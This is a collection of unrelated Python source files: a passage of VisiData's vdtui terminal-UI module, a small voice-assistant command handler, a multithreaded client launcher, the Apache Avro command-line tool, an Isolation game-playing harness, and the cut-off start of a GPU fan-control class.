'Set `_aggregator` to given `aggfunc`, which is either a function or a string naming a global function.'
if isinstance(aggfunc, str):
if aggfunc:
aggfunc = globals()[aggfunc]
if aggfunc:
assert callable(aggfunc)
self._aggregator = aggfunc
else:
self._aggregator = None
###### end cut
def format(self, cellval):
'Return displayable string of `cellval` according to our `Column.type` and `Column.fmtstr`'
if isinstance(cellval, (list, dict)):
# complex objects can be arbitrarily large (like sheet.rows)
return str(type(cellval))
t = self.type
val = t(cellval)
if t is date:
return val.to_string(self.fmtstr)
elif self.fmtstr is not None:
return self.fmtstr.format(val)
elif t is int:
return '{:d}'.format(val)
elif t is float:
return '{:.02f}'.format(val)
elif t is currency:
return '{:,.02f}'.format(val)
else:
return str(val)
@property
def hidden(self):
'A column is hidden if its width == 0.'
return self.width == 0
def nEmpty(self, rows):
'Count rows that are empty strings or None.'
vals = self.values(rows)
return sum(1 for v in vals if v == '' or v == None)
def values(self, rows):
'Return a list of values for the given `rows` at this Column.'
return [self.getValue(r) for r in rows]
def getValue(self, row):
'''Returns the properly-typed value for the given row at this column.
Returns the type's default value if either the getter or the type conversion fails.'''
try:
v = self.getter(row)
except EscapeException:
raise
except Exception:
exceptionCaught(status=False)
return self.type()
try:
return self.type(v) # convert type on-the-fly
except EscapeException:
raise
except Exception:
exceptionCaught(status=False)
return self.type() # return a suitable value for this type
def getDisplayValue(self, row, width=None):
if self._cachedValues is None:
return self._getDisplayValue(row, width)
k = (id(row), width)
if k in self._cachedValues:
return self._cachedValues[k]
ret = self._getDisplayValue(row, width)
self._cachedValues[k] = ret
if len(self._cachedValues) > 256: # max number of entries
self._cachedValues.popitem(last=False)
return ret
def _getDisplayValue(self, row, width=None):
'Format cell value for display and return.'
try:
cellval = self.getter(row)
except EscapeException:
raise
except Exception as e:
exceptionCaught(status=False)
return CalcErrorStr(options.disp_error_val)
if cellval is None:
return options.disp_none
if isinstance(cellval, bytes):
cellval = cellval.decode(options.encoding, options.encoding_errors)
try:
cellval = self.format(cellval)
if width and self._type in (int, float, currency):
cellval = cellval.rjust(width - 1)
except EscapeException:
raise
except Exception as e:
exceptionCaught(status=False)
cellval = WrongTypeStr(str(cellval))
return cellval
def setValues(self, rows, value):
'Set given rows to `value`.'
if not self.setter:
error('column cannot be changed')
value = self.type(value)
for r in rows:
self.setter(r, value)
def getMaxWidth(self, rows):
'Return the maximum length of any cell in column or its header.'
w = 0
if len(rows) > 0:
w = max(max(len(self.getDisplayValue(r)) for r in rows), len(self.name)) + 2
return max(w, len(self.name))
def toggleWidth(self, width):
'Change column width to either given `width` or default value.'
if self.width != width:
self.width = width
else:
self.width = int(options.default_width)
# ---- Column makers
def ColumnAttr(attrname, type=anytype, **kwargs):
'Return Column object with `attrname` from current row Python object.'
return Column(attrname, type=type,
getter=lambda r, b=attrname: getattr(r, b),
setter=lambda r, v, b=attrname: setattr(r, b, v),
**kwargs)
def ColumnItem(attrname, itemkey, **kwargs):
'Return Column object (with getitem/setitem) on the row Python object.'
def setitem(r, i, v): # function needed for use in lambda
r[i] = v
return Column(attrname,
getter=lambda r, i=itemkey: r[i],
setter=lambda r, v, i=itemkey, f=setitem: f(r, i, v),
**kwargs)
def ArrayNamedColumns(columns):
    '''Return list of Column objects from named columns.
    Note: argument `columns` is a list of column names, mapping to r[0]..r[n-1].'''
    return [ColumnItem(colname, i) for i, colname in enumerate(columns)]
def ArrayColumns(ncols):
    '''Return list of Column objects.
    Note: argument `ncols` is a count of columns.'''
    return [ColumnItem('', i, width=8) for i in range(ncols)]
def SubrowColumn(origcol, subrowidx, **kwargs):
'Return Column object from sub-row.'
return Column(origcol.name, origcol.type,
getter=lambda r, i=subrowidx, f=origcol.getter: r[i] and f(r[i]) or None,
setter=lambda r, v, i=subrowidx, f=origcol.setter: r[i] and f(r[i], v) or None,
width=origcol.width,
**kwargs)
def ColumnAttrNamedObject(name):
'Return an effective ColumnAttr which displays the __name__ of the object value.'
def _getattrname(o, k):
v = getattr(o, k)
return v.__name__ if v else None
return Column(name, getter=lambda r, name=name: _getattrname(r, name),
setter=lambda r, v, name=name: setattr(r, name, v))
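# Illustrative examples (not part of the original file) of the column makers above;
# the row shapes and column names are hypothetical:
#   ColumnAttr('name')                            # row is an object: reads/writes row.name
#   ColumnItem('qty', 1, type=int)                # row is a sequence/dict: reads/writes row[1]
#   ArrayNamedColumns('id amount date'.split())   # one ColumnItem per name, bound to r[0], r[1], r[2]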
def input(prompt, type='', **kwargs):
'Compose input prompt.'
if type:
ret = _inputLine(prompt, history=list(vd().lastInputs[type].keys()), **kwargs)
vd().lastInputs[type][ret] = ret
else:
ret = _inputLine(prompt, **kwargs)
return ret
def _inputLine(prompt, **kwargs):
'Add prompt to bottom of screen and get line of input from user.'
scr = vd().scr
if scr:
windowHeight, windowWidth = scr.getmaxyx()
scr.addstr(windowHeight - 1, 0, prompt)
vd().inInput = True
ret = vd().editText(windowHeight - 1, len(prompt), windowWidth - len(prompt) - 8,
attr=colors[options.color_edit_cell], unprintablechar=options.disp_unprintable, **kwargs)
vd().inInput = False
return ret
def confirm(prompt):
yn = input(prompt, value='n')[:1]
if not yn or yn not in 'Yy':
error('disconfirmed')
import unicodedata
def clipstr(s, dispw):
'''Return clipped string and width in terminal display characters.
Note: width may differ from len(s) if East Asian chars are 'fullwidth'.'''
w = 0
ret = ''
ambig_width = options.unicode_ambiguous_width
for c in s:
if c != ' ' and unicodedata.category(c) in ('Cc', 'Zs', 'Zl'): # control char, space, line sep
ret += options.disp_oddspace
w += len(options.disp_oddspace)
else:
ret += c
eaw = unicodedata.east_asian_width(c)
if eaw == 'A': # ambiguous
w += ambig_width
elif eaw in 'WF': # wide/full
w += 2
elif not unicodedata.combining(c):
w += 1
if w > dispw - len(options.disp_truncator) + 1:
ret = ret[:-2] + options.disp_truncator # replace final char with ellipsis
w += len(options.disp_truncator)
break
return ret, w
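# Illustrative example (not in the original source): odd whitespace is replaced by
# options.disp_oddspace, and the returned width counts terminal cells rather than characters:
#   clipstr('a\tb', 10)   # -> ('a·b', 3)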
## Built-in sheets
## text viewer and dir browser
class TextSheet(Sheet):
'Sheet displaying a string (one line per row) or a list of strings.'
@async
def reload(self):
'Populate sheet via `reload` function.'
self.rows = []
self.columns = [Column(self.name, width=self.vd.windowWidth, getter=lambda r: r[1])]
if isinstance(self.source, list):
for x in self.source:
# copy so modifications don't change 'original'; also one iteration through generator
self.addLine(x)
elif isinstance(self.source, str):
for L in self.source.splitlines():
self.addLine(L)
elif isinstance(self.source, io.IOBase):
for L in self.source:
self.addLine(L[:-1])
else:
error('unknown text type ' + str(type(self.source)))
def addLine(self, text):
'Handle text re-wrapping.'
if options.textwrap:
startingLine = len(self.rows)
for i, L in enumerate(textwrap.wrap(text, width=self.vd.windowWidth - 2)):
self.rows.append((startingLine + i, L))
else:
self.rows.append((len(self.rows), text))
class ColumnsSheet(Sheet):
def __init__(self, srcsheet):
super().__init__(srcsheet.name + '_columns', srcsheet)
self.addColorizer('row', 8, lambda self, c, r, v: options.color_key_col if r in self.source.keyCols else None)
self.columns = [
ColumnAttr('name', str),
ColumnAttr('width', int),
ColumnAttrNamedObject('type'),
ColumnAttr('fmtstr', str),
Column('value', anytype, lambda c, sheet=self.source: c.getDisplayValue(sheet.cursorRow)),
]
def reload(self):
self.rows = self.source.columns
class SheetsSheet(Sheet):
def __init__(self):
super().__init__('sheets', vd().sheets,
columns=list(ColumnAttr(name) for name in
'name nRows nCols nVisibleCols cursorValue keyColNames source'.split()))
def reload(self):
self.rows = vd().sheets
self.command(ENTER, 'moveListItem(vd.sheets, cursorRowIndex, 0); vd.sheets.pop(1)', 'jump to this sheet')
class HelpSheet(Sheet):
'Show all commands available to the source sheet.'
def reload(self):
self.columns = [ColumnItem('keystrokes', 0),
ColumnItem('action', 1),
Column('with_g_prefix', str,
lambda r, self=self: self.source.commands.get('g' + r[0], (None, '-'))[1]),
ColumnItem('execstr', 2, width=0),
]
self.nKeys = 1
self.rows = []
for src in self.source.commands.maps:
self.rows.extend(src.values())
class OptionsObject:
'minimalist options framework'
def __init__(self, d):
object.__setattr__(self, '_opts', d)
def __getattr__(self, k):
name, value, default, helpstr = self._opts[k]
return value
def __setattr__(self, k, v):
self.__setitem__(k, v)
def __setitem__(self, k, v):
if k not in self._opts:
raise Exception('no such option "%s"' % k)
self._opts[k][1] = type(self._opts[k][1])(v)
options = OptionsObject(baseOptions)
class OptionsSheet(Sheet):
def __init__(self, d):
super().__init__('options', d)
self.columns = ArrayNamedColumns('option value default description'.split())
self.command([ENTER, 'e'], 'source[cursorRow[0]] = editCell(1)', 'edit this option')
self.nKeys = 1
def reload(self):
self.rows = list(self.source._opts.values())
vd().optionsSheet = OptionsSheet(options)
# A .. Z AA AB .. ZY ZZ
defaultColNames = list(''.join(j) for i in range(options.maxlen_col_hdr)
for j in itertools.product(string.ascii_uppercase,
repeat=i + 1)
)
### Curses helpers
def _clipdraw(scr, y, x, s, attr, w):
'Draw string `s` at (y,x)-(y,x+w), clipping with ellipsis char.'
_, windowWidth = scr.getmaxyx()
dispw = 0
try:
if w is None:
w = windowWidth - 1
w = min(w, windowWidth - x - 1)
if w == 0: # no room anyway
return
# convert to string just before drawing
s, dispw = clipstr(str(s), w)
scr.addstr(y, x, options.disp_column_fill * w, attr)
scr.addstr(y, x, s, attr)
except Exception as e:
# raise type(e)('%s [clip_draw y=%s x=%s dispw=%s w=%s]' % (e, y, x, dispw, w)
# ).with_traceback(sys.exc_info()[2])
pass
# https://stackoverflow.com/questions/19833315/running-system-commands-in-python-using-curses-and-panel-and-come-back-to-previ
class suspend_curses():
'Context Manager to temporarily leave curses mode'
def __enter__(self):
curses.endwin()
def __exit__(self, exc_type, exc_val, tb):
newscr = curses.initscr()
newscr.refresh()
curses.doupdate()
def editText(scr, y, x, w, attr=curses.A_NORMAL, value='', fillchar=' ', truncchar='-', unprintablechar='.',
completer=lambda text, idx: None, history=[], display=True):
'A better curses line editing widget.'
def until_get_wch():
'Ignores get_wch timeouts'
ret = None
while not ret:
try:
ret = scr.get_wch()
except _curses.error:
pass
return ret
def splice(v, i, s):
'Insert `s` into string `v` at `i` (such that v[i] == s[0]).'
return v if i < 0 else v[:i] + s + v[i:]
def clean(s):
'Escape unprintable characters.'
return ''.join(c if c.isprintable() else ('<%04X>' % ord(c)) for c in str(s))
def delchar(s, i, remove=1):
'Delete `remove` characters from str `s` beginning at position `i`.'
return s if i < 0 else s[:i] + s[i + remove:]
def complete(v, comps, cidx):
'Complete keystroke `v` based on list `comps` of completions.'
if comps:
for i in range(cidx, cidx + len(comps)):
i %= len(comps)
if comps[i].startswith(v):
return comps[i]
# beep
return v
def launchExternalEditor(v):
editor = os.environ.get('EDITOR') or error('$EDITOR not set')
import tempfile
fd, fqpn = tempfile.mkstemp(text=True)
with open(fd, 'w') as fp:
fp.write(v)
with suspend_curses():
os.system('%s %s' % (editor, fqpn))
with open(fqpn, 'r') as fp:
return fp.read()
insert_mode = True
first_action = True
v = str(value) # value under edit
i = 0 # index into v
comps_idx = -1
hist_idx = 0
left_truncchar = right_truncchar = truncchar
while True:
if display:
dispval = clean(v)
else:
dispval = '*' * len(v)
dispi = i # the onscreen offset within the field where v[i] is displayed
if len(dispval) < w: # entire value fits
dispval += fillchar * (w - len(dispval))
elif i == len(dispval): # cursor after value (will append)
dispi = w - 1
dispval = left_truncchar + dispval[len(dispval) - w + 2:] + fillchar
elif i >= len(dispval) - w // 2: # cursor within halfwidth of end
dispi = w - (len(dispval) - i)
dispval = left_truncchar + dispval[len(dispval) - w + 1:]
elif i <= w // 2: # cursor within halfwidth of beginning
dispval = dispval[:w - 1] + right_truncchar
else:
dispi = w // 2 # visual cursor stays right in the middle
k = 1 if w % 2 == 0 else 0 # odd widths have one character more
dispval = left_truncchar + dispval[i - w // 2 + 1:i + w // 2 - k] + right_truncchar
scr.addstr(y, x, dispval, attr)
scr.move(y, x + dispi)
ch = vd().getkeystroke(scr)
if ch == '':
continue
elif ch == 'KEY_IC':
insert_mode = not insert_mode
elif ch == '^A' or ch == 'KEY_HOME':
i = 0
elif ch == '^B' or ch == 'KEY_LEFT':
i -= 1
elif ch == '^C' or ch == ESC:
raise EscapeException(ch)
elif ch == '^D' or ch == 'KEY_DC':
v = delchar(v, i)
elif ch == '^E' or ch == 'KEY_END':
i = len(v)
elif ch == '^F' or ch == 'KEY_RIGHT':
i += 1
elif ch in ('^H', 'KEY_BACKSPACE', '^?'):
i -= 1
v = delchar(v, i)
elif ch == '^I':
comps_idx += 1
v = completer(v[:i], comps_idx) or v
elif ch == 'KEY_BTAB':
comps_idx -= 1
v = completer(v[:i], comps_idx) or v
elif ch == ENTER:
break
elif ch == '^K':
v = v[:i] # ^Kill to end-of-line
elif ch == '^R':
v = str(value) # ^Reload initial value
elif ch == '^T':
v = delchar(splice(v, i - 2, v[i - 1]), i) # swap chars
elif ch == '^U':
v = v[i:]
i = 0 # clear to beginning
elif ch == '^V':
v = splice(v, i, until_get_wch())
i += 1 # literal character
elif ch == '^Z':
v = launchExternalEditor(v)
elif history and ch == 'KEY_UP':
hist_idx += 1
v = history[hist_idx % len(history)]
elif history and ch == 'KEY_DOWN':
hist_idx -= 1
v = history[hist_idx % len(history)]
elif ch.startswith('KEY_'):
pass
else:
if first_action:
v = ''
if insert_mode:
v = splice(v, i, ch)
else:
v = v[:i] + ch + v[i + 1:]
i += 1
if i < 0: i = 0
if i > len(v): i = len(v)
first_action = False
return v
class ColorMaker:
def __init__(self):
self.attrs = {}
self.color_attrs = {}
def setup(self):
self.color_attrs['black'] = curses.color_pair(0)
for c in range(0, int(options.num_colors) or curses.COLORS):
curses.init_pair(c + 1, c, curses.COLOR_BLACK)
self.color_attrs[str(c)] = curses.color_pair(c + 1)
for c in 'red green yellow blue magenta cyan white'.split():
colornum = getattr(curses, 'COLOR_' + c.upper())
self.color_attrs[c] = curses.color_pair(colornum + 1)
for a in 'normal blink bold dim reverse standout underline'.split():
self.attrs[a] = getattr(curses, 'A_' + a.upper())
def keys(self):
return list(self.attrs.keys()) + list(self.color_attrs.keys())
def __getitem__(self, colornamestr):
color, prec = self.update(0, 0, colornamestr, 10)
return color
def update(self, attr, attr_prec, colornamestr, newcolor_prec):
attr = attr or 0
if isinstance(colornamestr, str):
for colorname in colornamestr.split(' '):
if colorname in self.color_attrs:
if newcolor_prec > attr_prec:
attr &= ~2047
attr |= self.color_attrs[colorname.lower()]
attr_prec = newcolor_prec
elif colorname in self.attrs:
attr |= self.attrs[colorname.lower()]
return attr, attr_prec
colors = ColorMaker()
def setupcolors(stdscr, f, *args):
curses.raw() # get control keys instead of signals
curses.meta(1) # allow "8-bit chars"
# curses.mousemask(curses.ALL_MOUSE_EVENTS) # enable mouse events
# curses.mouseinterval(0)
return f(stdscr, *args)
def wrapper(f, *args):
return curses.wrapper(setupcolors, f, *args)
def run(sheetlist=None):
'Main entry point; launches vdtui with the given sheets already pushed (last one is visible)'
if sheetlist is None:
sheetlist = []
# reduce ESC timeout to 25ms. http://en.chys.info/2009/09/esdelay-ncurses/
os.putenv('ESCDELAY', '25')
ret = wrapper(cursesMain, sheetlist)
if ret:
print(ret)
def cursorEnable(b):
try:
curses.curs_set(1 if b else 0)
except:
pass
def cursesMain(_scr, sheetlist=None):
'Populate VisiData object with sheets from a given list.'
if sheetlist is None:
sheetlist = []
colors.setup()
for vs in sheetlist:
vd().push(vs) # first push does a reload
status('<F1> or z? opens help')
return vd().run(_scr)
def addGlobals(g):
'importers can call `addGlobals(globals())` to have their globals accessible to execstrings'
globals().update(g)
def getGlobals():
return globals()
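# A minimal usage note (not part of the original module); `some_sheet` stands for any
# Sheet instance built from the classes defined earlier in this file:
#   addGlobals(globals())   # expose the caller's names to execstrings
#   run([some_sheet])       # launch the curses loop with that sheet pushed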
|
kurisu_functions.py
|
#!/usr/bin/python3
from functions.exchange_rate import keywords_start as exchange_start
from functions.exchange_rate import keywords_response as exchange_res
from functions.exchange_rate import dialog as exchange_dialog
from functions.sound import keywords_start as sound_start
from functions.sound import keywords_response as sound_res
from functions.sound import play_from_url as sound_play_url
from kurisu_utils import *
from threading import Thread
stay_home = False
def commander_start(record):
global stay_home
if not stay_home:
addresses, names = get_near_devices()
for name in names:
if name == "Coconut451":
for addr in addresses:
if addr == "74:04:2B:4E:25:F3":
stay_home = True
print("Welcome back, dear.")
thread_play = Thread(target=sound_play_url, args=(record, engine, "https://storage.lightaudio.ru/39976010/2ea34344/Michael%20McCann%20%E2%80%94%20Home.mp3"))
thread_play.start()
if get_words(record) == "курс": # exchange_start lists all exchange-rate keywords that start the dialog
exchange_dialog(record, engine)
elif get_words(record) == "подключи": # check which devices are nearby
name, addr = get_near_devices()
connect_to_device(name, addr)
else:
print(get_words(record))
print("I don't know that command")
|
multiclient.py
|
# ----------------------------------------------------------------------
# Copyright (c) 2011-2016 Raytheon BBN Technologies
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and/or hardware specification (the "Work") to
# deal in the Work without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Work, and to permit persons to whom the Work
# is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Work.
#
# THE WORK IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
# HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE WORK OR THE USE OR OTHER DEALINGS
# IN THE WORK.
# ----------------------------------------------------------------------
import client
import sys
import threading
from datetime import datetime
def main():
threads = []
start = datetime.utcnow()
n = int(sys.argv.pop(1))
for i in range(n):
thread = threading.Thread(target=client.main, args=[sys.argv, False])
thread.start()
threads.append(thread)
for thread in threads:
thread.join()
end = datetime.utcnow()
print('Time =', end - start)
if __name__ == "__main__":
sys.exit(main())
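# A minimal usage note (not part of the original script); the trailing arguments are
# whatever client.main() expects, so the invocation below is illustrative only:
#   python multiclient.py 5 <client arguments...>
# which starts 5 client.main() threads and prints the total elapsed time.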
|
tool.py
|
#!/usr/bin/env python
##
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Command-line tool
NOTE: The API for the command-line tool is experimental.
"""
from __future__ import absolute_import, division, print_function
import os.path
import sys
import threading
import urlparse
import warnings
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
import avro.io
from avro import datafile, ipc, protocol
class GenericResponder(ipc.Responder):
def __init__(self, proto, msg, datum):
proto_json = open(proto, 'rb').read()
ipc.Responder.__init__(self, protocol.parse(proto_json))
self.msg = msg
self.datum = datum
def invoke(self, message, request):
if message.name == self.msg:
print("Message: %s Datum: %s" % (message.name, self.datum), file=sys.stderr)
# server will shut down after processing a single Avro request
global server_should_shutdown
server_should_shutdown = True
return self.datum
class GenericHandler(BaseHTTPRequestHandler):
def do_POST(self):
self.responder = responder
call_request_reader = ipc.FramedReader(self.rfile)
call_request = call_request_reader.read_framed_message()
resp_body = self.responder.respond(call_request)
self.send_response(200)
self.send_header('Content-Type', 'avro/binary')
self.end_headers()
resp_writer = ipc.FramedWriter(self.wfile)
resp_writer.write_framed_message(resp_body)
if server_should_shutdown:
print("Shutting down server.", file=sys.stderr)
quitter = threading.Thread(target=self.server.shutdown)
quitter.daemon = True
quitter.start()
def run_server(uri, proto, msg, datum):
url_obj = urlparse.urlparse(uri)
server_addr = (url_obj.hostname, url_obj.port)
global responder
global server_should_shutdown
server_should_shutdown = False
responder = GenericResponder(proto, msg, datum)
server = HTTPServer(server_addr, GenericHandler)
print("Port: %s" % server.server_port)
sys.stdout.flush()
server.allow_reuse_address = True
print("Starting server.", file=sys.stderr)
server.serve_forever()
def send_message(uri, proto, msg, datum):
url_obj = urlparse.urlparse(uri)
client = ipc.HTTPTransceiver(url_obj.hostname, url_obj.port)
proto_json = open(proto, 'rb').read()
requestor = ipc.Requestor(protocol.parse(proto_json), client)
print(requestor.request(msg, datum))
##
# TODO: Replace this with fileinput()
def file_or_stdin(f):
return sys.stdin if f == '-' else open(f, 'rb')
def main(args=sys.argv):
if len(args) == 1:
print("Usage: %s [dump|rpcreceive|rpcsend]" % args[0])
return 1
if args[1] == "dump":
if len(args) != 3:
print("Usage: %s dump input_file" % args[0])
return 1
for d in datafile.DataFileReader(file_or_stdin(args[2]), avro.io.DatumReader()):
print(repr(d))
elif args[1] == "rpcreceive":
usage_str = "Usage: %s rpcreceive uri protocol_file " % args[0]
usage_str += "message_name (-data d | -file f)"
if len(args) not in [5, 7]:
print(usage_str)
return 1
uri, proto, msg = args[2:5]
datum = None
if len(args) > 5:
if args[5] == "-file":
reader = open(args[6], 'rb')
datum_reader = avro.io.DatumReader()
dfr = datafile.DataFileReader(reader, datum_reader)
datum = next(dfr)
elif args[5] == "-data":
print("JSON Decoder not yet implemented.")
return 1
else:
print(usage_str)
return 1
run_server(uri, proto, msg, datum)
elif args[1] == "rpcsend":
usage_str = "Usage: %s rpcsend uri protocol_file " % args[0]
usage_str += "message_name (-data d | -file f)"
if len(args) not in [5, 7]:
print(usage_str)
return 1
uri, proto, msg = args[2:5]
datum = None
if len(args) > 5:
if args[5] == "-file":
reader = open(args[6], 'rb')
datum_reader = avro.io.DatumReader()
dfr = datafile.DataFileReader(reader, datum_reader)
datum = next(dfr)
elif args[5] == "-data":
print("JSON Decoder not yet implemented.")
return 1
else:
print(usage_str)
return 1
send_message(uri, proto, msg, datum)
return 0
if __name__ == "__main__":
if os.path.dirname(avro.io.__file__) in sys.path:
warnings.warn("Invoking avro/tool.py directly is likely to lead to a name collision with the python io module. Try doing `python -m avro.tool` instead.")
sys.exit(main(sys.argv))
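# A minimal usage note (not part of the original tool); the file names below are
# placeholders, mirroring the usage strings printed by main() above:
#   python -m avro.tool dump data.avro
#   python -m avro.tool rpcsend http://localhost:8080 proto.avpr messageName -file datum.avro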
|
__init__.py
|
###############################################################################
# DO NOT MODIFY THIS FILE #
###############################################################################
import inspect
import logging
import sys
import textwrap
import time
from collections import namedtuple
from enum import Enum
from multiprocessing import Process, Pipe
from queue import Empty
from .isolation import Isolation, DebugState
__all__ = ['Isolation', 'DebugState', 'Status', 'play', 'fork_get_action']
logger = logging.getLogger(__name__)
Agent = namedtuple("Agent", "agent_class name")
PROCESS_TIMEOUT = 5 # time to interrupt agent search processes (in seconds)
GAME_INFO = """\
Initial game state: {}
First agent: {!s}
Second agent: {!s}
"""
ERR_INFO = """\
Error playing game: {!s}
Initial state: {}
First agent: {!s}
Second agent: {!s}
Final state: {}
Action history: {!s}
"""
RESULT_INFO = """\
Status: {}
Final State: {}
History: {}
Winner: {}
Loser: {}
"""
class Status(Enum):
NORMAL = 0
EXCEPTION = 1
TIMEOUT = 2
INVALID_MOVE = 3
GAME_OVER = 4
class StopSearch(Exception): pass # Exception class used to halt search
class TimedQueue:
"""Modified queue class to block .put() after a time limit expires,
and to include both a context object & action choice in the queue.
"""
def __init__(self, receiver, sender, time_limit):
self.__sender = sender
self.__receiver = receiver
self.__time_limit = time_limit / 1000
self.__stop_time = None
self.agent = None
def start_timer(self):
self.__stop_time = self.__time_limit + time.perf_counter()
def put(self, item, block=True, timeout=None):
if self.__stop_time and time.perf_counter() > self.__stop_time:
raise StopSearch
if self.__receiver.poll():
self.__receiver.recv()
self.__sender.send((getattr(self.agent, "context", None), item))
def put_nowait(self, item):
self.put(item, block=False)
def get(self, block=True, timeout=None):
return self.__receiver.recv()
def get_nowait(self):
return self.get(block=False)
def qsize(self): return int(self.__receiver.poll())
def empty(self): return not self.__receiver.poll()
def full(self): return self.__receiver.poll()
def play(args): return _play(*args) # multithreading ThreadPool.map doesn't expand args
def _play(agents, game_state, time_limit, match_id, debug=False):
""" Run a match between two agents by alternately soliciting them to
select a move and applying it to advance the game state.
Parameters
----------
agents : tuple
agents[i] is an instance of isolation.Agent class (namedtuple)
game_state: Isolation
an instance of Isolation.Isolation in the initial game state;
assumes that agents[game_state.ply_count % 2] is the active
player in the initial state
time_limit : numeric
The maximum number of milliseconds to allow before timeout during
each turn (see notes)
Returns
-------
(agent, list<(int, int)>, int)
A tuple of the winning agent, the list of actions that were applied
to the initial state, and the match id of the game
"""
initial_state = game_state
game_history = []
winner = None
status = Status.NORMAL
players = [a.agent_class(player_id=i) for i, a in enumerate(agents)]
logger.info(GAME_INFO.format(initial_state, *agents))
while not game_state.terminal_test():
active_idx = game_state.player()
# any problems during get_action means the active player loses
winner, loser = agents[1 - active_idx], agents[active_idx]
try:
action = fork_get_action(game_state, players[active_idx], time_limit, debug)
except Empty:
status = Status.TIMEOUT
logger.warning(textwrap.dedent("""\
The queue was empty after get_action() was called on {}. This means that either
the queue.put() method was not called by the get_action() method, or that
the queue was empty after the procedure was killed due to timeout {} seconds
after the move time limit of {} milliseconds had expired.
""".format(players[active_idx], PROCESS_TIMEOUT, time_limit)).replace("\n", " "))
break
except Exception as err:
status = Status.EXCEPTION
logger.error(ERR_INFO.format(
err, initial_state, agents[0], agents[1], game_state, game_history
))
break
if action not in game_state.actions():
status = Status.INVALID_MOVE
break
game_state = game_state.result(action)
game_history.append(action)
else:
status = Status.GAME_OVER
if game_state.utility(active_idx) > 0:
winner, loser = loser, winner # swap winner/loser if active player won
logger.info(RESULT_INFO.format(status, game_state, game_history, winner, loser))
return winner, game_history, match_id
def fork_get_action(game_state, active_player, time_limit, debug=False):
receiver, sender = Pipe()
action_queue = TimedQueue(receiver, sender, time_limit)
if debug: # run the search in the main process and thread
from copy import deepcopy
active_player.queue = None
active_player = deepcopy(active_player)
active_player.queue = action_queue
_request_action(active_player, action_queue, game_state)
time.sleep(time_limit / 1000)
else: # spawn a new process to run the search function
p = None
try:
p = Process(target=_request_action, args=(active_player, action_queue, game_state))
p.start()
p.join(timeout=PROCESS_TIMEOUT + time_limit / 1000)
finally:
if p and p.is_alive(): p.terminate()
new_context, action = action_queue.get_nowait() # raises Empty if agent did not respond
active_player.context = new_context
return action
def _request_action(agent, queue, game_state):
""" Augment agent instances with a countdown timer on every method before
calling the get_action() method and catch countdown timer exceptions.
"""
agent.queue = queue
queue.agent = agent
try:
queue.start_timer()
agent.get_action(game_state)
except StopSearch:
pass
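# A minimal local usage sketch (not part of the original module). DummyAgent is
# hypothetical and simply plays the first legal action; it assumes Isolation()
# constructs the initial game state, as in the companion isolation module, and it
# uses the in-process debug path of _play to avoid spawning subprocesses.
if __name__ == "__main__":
    class DummyAgent:
        def __init__(self, player_id=0):
            self.player_id = player_id
            self.queue = None
            self.context = None

        def get_action(self, state):
            # Report the first available action through the timed queue.
            self.queue.put(next(iter(state.actions())))

    demo_agents = (Agent(DummyAgent, "first"), Agent(DummyAgent, "second"))
    winner, history, match_id = play((demo_agents, Isolation(), 10, 0, True))
    print(winner.name, "won after", len(history), "plies")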
|
gpu_ctl.py
|
#!/usr/bin/env python3
import os
import sys
import time
import re
import syslog
import argparse
import subprocess as sb
from threading import Thread
import pynvml as nv
from gpuctl import logger
from gpuctl import PciDev, GpuAMD, GpuNV
from gpuctl import FileVarMixn as fv
from gpuctl import ShellCmdMixin as sc
__all__ = ['GpuCtl']
class GpuCtl():
INTERVAL = 5
WAIT_PERIOD = 120
def __init__(self, **kwargs):
self.vendors = None
# overwrite default value with arguments
valid_keys = ["gpu_devices",
"fan", "curve", "delta", "temp", "tas", "verbose"]
for k in kwargs.keys():
if k not in valid_keys:
raise ValueError(f"invalid GpuCtl argument: {k}")
for key in valid_keys:
setattr(self, key, kwargs.get(key))
self.thread = None
self.abort = False
# if curve is set, apply curve to all GPUs
if self.curve:
for gpu_dev in self.gpu_devices:
gpu_dev.set_curve(self.curve)
# temp
self.gpu_dict = {}
# fan
# self.fan_ctrl_flag = False
# action script
self.interval = GpuCtl.INTERVAL
self.wait = GpuCtl.WAIT_PERIOD
for gpu in self.gpu_devices:
gpu.prev_temp = None
gpu.fan_ctrl_flag = False
def _fan_control(self, gpu, t):
if t and not gpu.fan_ctrl_flag and (self.fan and t > self.fan):
logger.debug(f'[{gpu.pci_dev.slot_name}/{gpu.name}] fan control is activated')
gpu.fan_ctrl_flag = True
if not gpu.fan_ctrl_flag:
return
speed = gpu.temp_to_speed(t)
ptemp = gpu.prev_temp
# if the temperature changed by more than the configured delta, update the fan speed
if ptemp is None or abs(t - ptemp) > gpu.temp_delta:
logger.info(
f"[{gpu.pci_dev.slot_name}/{gpu.name}] current temp. {t}c set speed {speed}%")
gpu.set_speed(speed)
gpu.prev_temp = t
def _failure_action(self, gpu, t):
if self.tas:
try:
msg = f"[{gpu.pci_dev.slot_name}/{gpu.name}] over temperature {self.temp}c, exec {self.tas}"
logger.warning(msg)
syslog.syslog(syslog.LOG_WARNING, msg)
rv = sc.exec_script(self.tas, params=gpu.pci_dev.slot_name)
if self.verbose:
logger.debug(f"[{gpu.pci_dev.slot_name}/{gpu.name}] result: {rv.decode('utf-8')}")
except:
